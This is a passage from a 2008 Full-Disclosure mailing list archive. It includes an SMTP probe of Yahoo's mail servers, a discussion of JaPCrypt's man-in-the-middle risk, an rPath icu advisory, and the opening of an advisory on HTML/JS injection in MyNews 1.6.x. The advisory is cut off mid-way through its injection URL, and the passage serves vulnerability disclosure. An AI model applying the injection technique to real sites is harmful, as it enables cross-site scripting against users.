utdallas.edu) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ From hhoffman at ip-solutions.net Wed Feb 6 17:25:19 2008 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Wed, 06 Feb 2008 12:25:19 -0500 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: <3154.1202318234@turing-police.cc.vt.edu> References: <47A992D7.1070503@syn-ack.org> <3154.1202318234@turing-police.cc.vt.edu> Message-ID: <47A9ED7F.3090208@ip-solutions.net> You just need to take it a step further :-) ... rcpt to: 250 recipient ok data 354 go ahead Testing . 554 delivery error: dd This user doesn't have a yahoo.com account (nosuchuser12323123123123132124432342 at yahoo.com) [0] - mta367.mail.mud.yahoo.com 421 Service not available, closing transmission channel. Connection closed by foreign host. Valdis.Kletnieks at vt.edu wrote: > On Wed, 06 Feb 2008 10:44:10 CST, Paul Schmehl said: > >> RCPT TO: >> 250 recipient ok > > % telnet f.mx.mail.yahoo.com 25 > ... > rcpt to: > 250 recipient ok > > Yee. Hah. They 250 for a probably-nonexistent account (unless that > one actually *does* exist? :) > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From gerardo at linux.it Wed Feb 6 18:05:48 2008 From: gerardo at linux.it (Gerardo Di Giacomo) Date: Wed, 06 Feb 2008 19:05:48 +0100 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <47A9981E.5090802@linux.it> References: <47A9981E.5090802@linux.it> Message-ID: <20080206180557.7C1553A5@lists.grok.org.uk> It's true that with MITM you could "poison" the javascript to steal the key (cookie stealing style) but I think that it's a reasonable risk due to the "non-enterprise" environment, in which the suite has been thought for. Stealing the key requires a targeted attack MITM, in a precise moment. I think it's better to use JaPCrypt then normal HTTP... and don't forget that all pages "protected" with JaPCrypt won't be indexed by crawlers. The "main" problem by now is not massive MITM but massive sniffing, and with this suite the problem of "mass-sniffing" is avoided. Regards, Gerardo -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 249 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/2f5495b4/attachment.bin From announce-noreply at rpath.com Wed Feb 6 18:31:29 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Wed, 06 Feb 2008 13:31:29 -0500 Subject: [Full-disclosure] rPSA-2008-0043-1 icu Message-ID: <47a9fd01.SZq0IMfe2weF+H0s%announce-noreply@rpath.com> rPath Security Advisory: 2008-0043-1 Published: 2008-02-06 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: icu=conary.rpath.com at rpl:1/3.4-5.1-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2199 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4770 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4771 Description: Previous versions of the icu package are vulnerable to Arbitrary Code Execution and Denial of Service attacks in which user-assisted attackers can use malformed regular expressions to cause memory corruption or excessive memory consumption in applications that use libicu. http://wiki.rpath.com/Advisories:rPSA-2008-0043 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From worriedsecurity at googlemail.com Wed Feb 6 18:43:25 2008 From: worriedsecurity at googlemail.com (worried security) Date: Wed, 6 Feb 2008 18:43:25 +0000 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: <351ABF9DBD9106470C4ECD82@utd59514.utdallas.edu> References: <47A992D7.1070503@syn-ack.org> <3154.1202318234@turing-police.cc.vt.edu> <47A9ED7F.3090208@ip-solutions.net> <351ABF9DBD9106470C4ECD82@utd59514.utdallas.edu> Message-ID: <67ea64530802061043q6b1d4a82w88cf3ed6ba89e502@mail.gmail.com> On Feb 6, 2008 5:40 PM, Paul Schmehl wrote: > BTW, privately I was informed that the *real* address is security at yahoo-inc.com. > > Who knew. everyone knew... http://security.yahoo.com http://security.yahoo.com/all_topics.html http://security.yahoo.com/article.html;_ylc=X3oDMTFwdDk2OGQ0BF9TAzU2NTAwMDAwNgRhaWQDMjAwNjEyMDUwMQRjbmFtZQNZb3VyIFNlY3VyaXR5IG9uIFlhaG9vIQ--?aid=2006120501 three clicks is all it takes. just because you're a spaz doesn't mean we all are. From skyout at gmx.net Wed Feb 6 19:06:13 2008 From: skyout at gmx.net (SkyOut) Date: Wed, 6 Feb 2008 20:06:13 +0100 Subject: [Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability Message-ID: I know its basic, but I am a supporter of FD and therefore planetluc.com has to be blamed now! I checked their script MyNews in version 1.6.4 today and then some other versions, all are vulnerable to HTML and JS injection. --- ADVISORY --- ---------------------------- || WWW.SMASH-THE-STACK.NET || ----------------------------- || ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability _____________________ || 0x00: ABOUT ME || 0x01: DATELINE || 0x02: INFORMATION || 0x03: EXPLOITATION || 0x04: GOOGLE DORK || 0x05: RISK LEVEL ____________________________________________________________ ____________________________________________________________ _________________ || 0x00: ABOUT ME Author: SkyOut Date: February 2008 Contact: skyout[-at-]smash-the-stack[-dot-]net Website: http://www.smash-the-stack.net/ _________________ || 0x01: DATELINE 2008-02-06: Bug found 2008-02-06: Advisory released ____________________ || 0x02: INFORMATION The MyNews script by planetluc.com in all versions of the 1.6.X tree is vulnerable to HTML and JS injection due to no sanitation of the "hash" value in combination with the action "admin". _____________________ || 0x03: EXPLOITATION No exploit is needed to test this vulnerability. You just need a working web browser. 1: HTML Injection To make a HTML injectioni, visit the websites main page. The name might differ from the original name "mynews.inc.php", mostly its called "index.php". Now construct a malformed URL as follows: http://www.example.com/index.php?hash=">